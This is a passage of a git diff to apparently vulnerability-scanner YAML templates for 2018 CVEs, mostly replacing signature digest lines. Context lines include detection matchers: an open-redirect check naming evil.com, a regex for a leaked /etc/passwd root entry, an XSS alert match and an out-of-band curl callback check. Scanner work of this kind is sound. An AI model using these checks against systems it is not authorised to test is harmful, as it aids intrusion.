4b0a004830460221008a613403e95cd869d597b3567f9774508802b578940d4923d3e724796ed4a51d022100e7705c676701af5b47545de5a166c31d2a905825dee9546405c3aa21ab76d712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f577e87fb7faacc4dc64dbe19fd42241785f865be0875b60af563a393ef813ad022028628bf09067fa419b7b5ed8ea0b2610fbfa7b643114361ad2a18bd2d593338b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 1fabdefdf7..b18db5b54b 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -47,4 +47,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 490a0046304402203711794115d3d48fe1e54bde3f66294c6322bb5832ec13b693571002187aef62022005459fec38936e0160b953d01498c72eb1547cb6cb2acc349339e9198d2af996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef42faf462b056809e87c56a2bd991601c0d4b37f9b1b0aa4e16c58a0cc1762802204ecf6513868b5bb6ce9f8b4a830ded2d3c2a660d9e27255179622995bacbc87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index ec8b051602..50e9de4953 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff8e2819554ce13b65be92c0e0817693ae784d7a5bda9516043c29baf3aa80d3022100e51109d7d609a86eae88cc6ca27706ca658e1257ee76890516cbb810a1b12acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220717d039ed3d0c44efc077565f10a9d632f99a68ce59eb9727eab144859504d19022010d4bff8932d9b2acb3d4bedcc622e8d3c1d07574b96f4be8007807b4aff57bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 91fdf83e50..5921121a41 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c43687be0d104b8b61c5820fb3108d1d4a4cfa6bea57b77dcbcd94a7af9ea2e022100936a9dd029ea2f1718385f1222bd9262bae98a93d800bfc22900ee053409f0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010703c11bfff4211b5d3dd1e2a4c3470d072bbcb0d098ce3deb3d350cae0cc5f0220309d5e6e8303c24a00c176fc00478a874c05c4ce1f95e68265d988d135925efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 091e45eb21..23d5c6f885 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb4b10a8be843bbc16bdad1882a670d91a4df47976608093c047e589d1ec9d5f022100db20167c16d3b5a54b8abadd1035b44725fa8989926dadda9c968bc8727520d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index c39437908b..d8625a298d 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220643bdad602251cc6d58d10ec184ad17a9593ec38da13e56f779cf51b825cb69d022100ba41ad28cf862dd0e27bf39455c80ca81106197236893508abca3f291d04b6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100803bf8360cb7071f91b5033f54e04080f5ceb4dd645c8d7a14d652192cb130a8022020dd215c39c6d85861fe99504d663c6dfdc065fc06b02d3a73e325b842b014db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 85e689d5d6..dabb180f98 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -48,4 +48,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")' -# digest: 4a0a00473045022100c343b83bb6fcdc9813518d37b54f04f87156c39b79722af6ac38cc7fdd596bca0220703ec1e97ae904cd7b353800c82f2b395a48062f8439eec1b4b4a2a9eabe91c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d79476c70fa102654cab950b22602f5882de9dfeac38e0a2759ebdf47848b0002210080ad77784df5e34a99efb752ce781684d27cda392d9c88371be16590782e9e60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 979ca8a95b..398a9dc095 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201fb81765e18255ee1455d4ffdf1c2f4a8423e9fa99a230aef65bdf36dce39db4022100ab9385e54fd245662105f2243c1d25bc4e1c82be787d4f23aea1c9273d13a2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d51eff5c4659c4fd0d5106f31182c5ebc798e84bbb4572f10adf0f01d61771ca02200a2522b02dbb45f65e4f8ebbb3d857d0a98c3b467de192bb0a256222a13a3a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 865adb4626..e9a3c267e5 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -51,4 +51,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022007c53cf671939677e00de61243865a0068c5542caaa6c5cd30f75ccdd260b635022100f46356ee53fbf6fa0d8cd6812648b170cec5116aa67dee258bc1d3a8601851da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0b256edd487a4e35692ced0880977fb54adc0c0c2c0104435696e447edf167d022100c839934f8b9be8f49836ed75711777736cb85e7e81d1380fdb8f7bf5373de4a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 3e88248f87..b3d26da509 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d7436ced4be69231d67f9b6d6fddf86f75ca1a49358007478a1cacc3869f56c02206093ccabaa5b727f429b541d96da3d9028334eb9b029a25ba8128795d70b7f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065a911e4817469f0fbb48b8f3f0364ed15260bc4b970a52c536ea3b0b7d172a8022100d616870d8e78df9250965cdffbc0fc0773d1a7e7445ad7e44e713526627905bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 93a1a9baa4..05d33ce9b5 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a7525decbb4900d6df4ebff0a8ecf9f11dbb17f10b61a59c45f8837ab3e3375d022100f61ce3800147fd13bc690df9bfc1eecdcc22c78bc4292c2f298468b2f1d0f993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9765a14334213d3b5930facef230f55ac115ca46a11dca771e555671cc42ab9022024f962372463277919d24ff3d38d59314f30a5c9c236068d102cc52c64438e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 581b4f70d4..b1b69e0cf4 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085b48bbdf595b702ebec999f9e07ec650e2ca0276e09d9ab926467143c087d0d022063857749f628ad5e3d598a8e17fa18c4708545c2196caebf9b7505e171159d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f196bf18524ab10142eecd5b8191d5f53fc122eccf6495bac2f54118b5abeabe022031321a5940e0d8e68ed6dd1303aa18fcafba2a00dd69f548d635ef078fdfa199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 7950bb3bd4..a551f63c9b 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -57,4 +57,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, "><script>alert(document.domain)</script></a>")' condition: and -# digest: 4b0a00483046022100c634c1d3655ae86d99caaad29c7f5a5d4ef4d696601e6b952bb796b1326800c7022100f409497a17e56982fb3e63e4424b98b22222eeb4b224a7647417f3220245c8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8a9aa4d6b7c052579d93f04eaab9181746b519dd1c371bc930badfc4f9e8bbb022100843edb31b879450566877ea410e6039b12bd435c9ec6a24e42447fbad37e0c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index a886533c65..7f6c07b15f 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd109d98fe07e455a983fbdc744eddc0e98799953fbecb2ea8c6c3685b269f2f02206cd947548c3e2c8320eb080c2eb5d29897e6462e5deef92494e8f9017eb5e032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202757c9dfa0a18ff115fff7547e0077afb276b494e0056ea9a816213a77703ff50221008b30ebecdda9cbb9ca9ac45a013c8c07106f7dc42a61a6fb8dd688d672da6092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index a45543cd4d..b965c09fa5 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -87,4 +87,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ee02dd47b6b3c05b72a24cdb480ebcc738ba4837418f2ac64ab1dfeab56a387022100f2c41a434ce9405e513488732ab8468d5d007f7507f6a3a740f78bc65bbe2cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100969b7931eef16c35dad0a3ff96312be6778fc070a2fa4b1629741566a3d3221402204b0bbbabf6884dd90886ac0bcb080b5a5c83fcfd7bd4ed550c650b1b387d1081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index b5ace6eb8a..8ee39d5495 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220451e0c729542bbf1f70a346710c8cc9f758c0e3517c5c0664ef0e781961e55d40221009d3fe32da8a123ae8a019a4c99ed760251ef534e01f21ab955844156628bcea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9e3de140b1c4a8004632accfa0ce32b7bf29ad81d8e2a14b077cbbc7c33625102210089063efc5aa1b7fe8f70957c84b16ff418069ea9bfcaa5b80c5849a9accefd30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 4154a5580e..13cc25cbb6 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -108,4 +108,4 @@ http: regex: - <keyStoreItem><id>([0-9]+)</id><name>{{randstr}} internal: true -# digest: 4b0a00483046022100b83441e3166c0b0df2a8987853e3c5879b9c6085dcbb0cd6fc1adcb0a5a70138022100c1f01ed6dd9afe9b30f2ee90a24612dc75903fcd58176553091cec2c83e7a700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220169032f914a7d02149848a05504d558f1ce66b9779112a7d6bbac4d57e30c04c022100d61248b080ed3b7988fcf29f30f87144369842ff3644574c16722a7f68dc54d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 594ed4bde9..39389f6f6e 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e292b775f495cee76f716227f5dd4f8303296744b5ddfd30df10db6e346985290220043f44579862f82d6d7e74fc6bb683fd81c202cc7d66fcc96793e875d1ab8cea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202432fb6767bc725147a87888970b7c6725467887b01b87ad6b852bfb232beb76022100a42253a9bb8c65ff109a5424daa091a5d787ee4c0ff4ca8682e9b00869532ef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 5ce7802bfc..45f223af31 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205d94c87049351a7f101fba0ce3581719bf527bb968cce242462e921bafa0078f02200bc9faa1036e72caf538f0ddb1b87af9dab5610c4bb1656fa71d9e41048c03f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039c462a8a512f96f87f6eca877264adfd40fa62d56e27db272b1a94174889fe2022020ed38db65838db0ff92d6edf60525c4672dd0bc5772977511d69659ca898210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 42ba6c036c..ae9f315a58 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205cbe5bc8927aa551dacb48b3bd778916c3a1b69cfebc4f4b803cb99ca8c670160220709e158072a722d8ff00a439bbf24f831dcd951d065ae4962d2ee56ceb893da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b780d8c45ba055df31c09d04de06240306453410047933d85e4f505699fd01d402200122df5f99477736773e5576da22e81ec6df51d077454280b1a791891a62cb22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 2ab0e02d95..3e158e5405 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fcf47f518b5c8a2c231867c828cddd000f1cc983e51583f84e7c24dfc925445a022100d09a0b84827184d7a8da4a412b6937c6436e1b9b4ace03f2af2130806f6baa11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100deb28e2e6f5f15ad5bdd80372351f5156d7b25d7ef2aa9aed9c412750736dbda02200e1297f930472575a4b7c03ffed44e9045dc695cb8db9aa0f21764f5418f7449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 795bd92f3b..14a63d16fa 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ec5427f7148858468b07f9d9752089db2bd5c548e72827ce9456cfce69fe860022018534fbeffb2b41e4f76779db2f06ae1771689e3a9fc8a2e6c892de2fb687be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207668b80438b471a293f9000e2064291c278349d1a3a43df999c262649f2a5556022015fc634406e25d7632bc7e5c88942023b20fda8ecd402acc34be2c3ef8806203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 8688ccbff7..0b5efa7fc7 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -52,4 +52,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100cb992aea6ed9345fa954525bb3ec088e711e697ac7be95a866d69a346c85e1290220143c40bfe9bf272a8000dcf2bff011c41a7b66adf23a45fa8ff59ecedae94609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4e521bec5b1a3e4c733f83557f03f44cdd06172dcd4d0951550849c8a7118bb022100871841f27984f32a681caba8da22e8bfe7fa318a49bf09eceea3d931be277362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6605.yaml b/http/cves/2018/CVE-2018-6605.yaml index 3a85283d87..6bb98091a9 100644 --- a/http/cves/2018/CVE-2018-6605.yaml +++ b/http/cves/2018/CVE-2018-6605.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079e33c0fd8732cb91241ed74b8390f59910f590cde26d8a6f203a2d6144e73f6022100b5780479074bab7349b98bd3abfdd4154417dba8a0dfa08470b549a28d182a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4600dbe01c8f7f7cb92b9c3dda61c1b9ef8d68675e2ca7d7e3696eca6090270022075b93d0557782b56c9d2522d377eb3b2fa73067a7024393997f19dad3e012dac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 8fb53faba4..a7a315c447 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220057eae85c0699ecc345f4158ec61b98fb01dbe82f6b264cee2a711b22c1b3b28022100a931745c97d34d3e518456589ca9cdd2f2d1c4d4920d8748cecdba748eec1d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f69536487e527322be9387e60602e850ab7e8185fc289904682b621cd3ef9e9302200a62d3a92825cf3a0657e6dfbdc1de660fd90aac5f461bc8e595ae557a1ef7ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index ddedd992b0..5827e2264a 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 490a004630440220207da10f0dc507b4fe74ff6e86ff0f5f8ed80271153998a385043d4d7dd6fffe022023ef15c2a79389d9f4f724a90dd9102aae5e3457652f1ee51d7b229dfc072f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index a9ca01dec4..f39d5cef3f 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -41,4 +41,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 490a004630440220722cc7f9d0e567817e7947b5b87701bcdd80c1033bfca3be769f9f9f297e8e54022017d46b1bb498cb9d02debccacc4518f31dfcba52e4db8b0f30cf3da8e38ce8f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022013223ae52cb825068e64f3b321f3ef5f86cd073b7014161dc40db24c4390224a02205f135e1001fdf736739d63eeabdb0b908940f7be65599a41c3ead1cffff0966a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index e9416713ee..7630f249fb 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -50,4 +50,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a00463044022045b45abf9a2ea892ca131c72b27b4ea33c386f38479c00799bdc90cbdc797c73022069c3f12d52b16cd6e251f8b147a51558ec0eaf063e3009e0f85427d893775d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d130ae4cb695a939a7a148ce741cb735003593334f98ecdb200b1ed63ce06d40022100c748611fd920ad420a8da6b17e7dfed8b6e1f64236b1e81b77129ea771faa24e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 4ce8ed79e0..1205086ae4 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201914043df006e7871b073873357dcae4f895b022765c4548f30bd37913a42a90022100e87df0cac8b1777590d54b0a2e6c0da7893c61bac369032cfbc03ad74e2d287b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b07fb8377e81cc3449297eddacae6226164690a419c5a1f2ae4d6ffdec05aef022065e2bc089c44892b2fd8f6adfe11239ca4b7d5bb413915445ee5883cfebbb859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 7d74d88633..3c71f40e76 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -86,4 +86,4 @@ http: - '<input type="hidden" name="form_build_id" value="(.*)" />' internal: true part: body -# digest: 4a0a0047304502202d2710f951db7f42ffbe35520feccb277f78e22dc8f10c354f2aa29edb7120e3022100da118a7c6946b7da9ed54ff1617399618c8a3fdce400375c4fe24cdd0c1838bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7d95a688ff5d7de202bae2f3a754ac8671c76c0fea374661d2ae82d6348062d022100b139af4b377f42236d85c4e72168a78253d5ff8174ecd334ecc3e667e18fdbdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 6171168059..c36ca087ec 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220349646e629207f53dbcbac604439948f3417458e17708a75dc87c564d7dbbed20220177685393f75d3aba7c78cfb11674efa564bea05aae092ab681716d96cdde44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220054d38cc9cefddeceb4174fd435c029b0bd07f818482ccc8ef6c85e142223a1702200e8d3f162339a76588749e9c816121f27d41423f7fc527183ae443dc9600fdff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 8952662f24..b49071d353 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022004b883c8d19126ea1e29ef6a041ed23d893f36fc247f060356afa9e020f8acb8022100dd9ef2efefad420bbff52b8f3708925755b7fae6153ed9a43c26c795c5d76adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c1f448504d04f0de4513733a376971730b3044920da2518eb2baa8f76550507022071087c9172d9f636854a119ec81b29855b7aa713986bb139af216aa2a13f6315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index b3de60671d..64c6184bd0 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010f10cc4688e28353a393c312e28aeef7a9ad41a7cf07e6a10812e8f60eb4066022100d5392973491ba3d359ac52e1e3ca8e4e61c1dee7a80e84be49b71416ed17e8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0463b0269827b10c042e60e307ca705f7b1d73716809e8b6ba1fcc115d0d58d0221009ab44f256b936e19e44637aa657cfbb6639e1b227e2a2c96b6e953a2800afd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 87f70b3915..a7569d0308 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ecea4e629ad9e17c58a766f9588495d12fcf7ddbc84d3fa34fd478c83258814022100f71e483743b5475d9c6cfb08a5c136c79e2487c7328ac1d395c9aca893266fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8c7cdcb8f7ec1f707a8b58e43d7a8b5f4f59ca1b454bde8b0dba09f4c13563f02205d509b2aaae1a1b38f59a10ed74e275e1a3bbac984092b524c15c38745b2e232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index 808deae28a..7699125799 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -42,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100e4f3645237dd0687e5355154aabe1cfa686bd429de94833b78578e5fd304c80802203b24f4154b365a6c6733c23cb169f4001b029dccd065c2413cb5aa5672406e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100807e5b7e34e391d45acee418479b6eca1df5ed7c630992a7d46ac020d1aed8b6022100fbe67ce37ff80615abd2f2365690b7eb4c451711a48b9305509218ec620cfb9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 8cbd4e73e9..4a83fcf348 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1fbf7202b9899b321c7a7bc76329ebf3af2b40b8304fc849dbbc96d0168b214022100e307e5250c290b63e6d58f58c5405fff91ca4388b234624b06da417e6c43811a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020fd2778b4bc4326ed88677820db64b99867bd69d8c6e9b018a5a83b3b0cd2fc02201a8ea6987a9e9e252adf2a777bde66ea5cb23e356da3e500bd443d6e54f2508a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 5ada80fe34..2adf16aea8 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089a37a72b700ed30f6f4af4d738ea62aec25bbd5d92c9e5d298a3f82136a3e87022100a985aafcb505a8df88d1070cdc302c358244facdf48a006b3b1c0b253e3c2da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 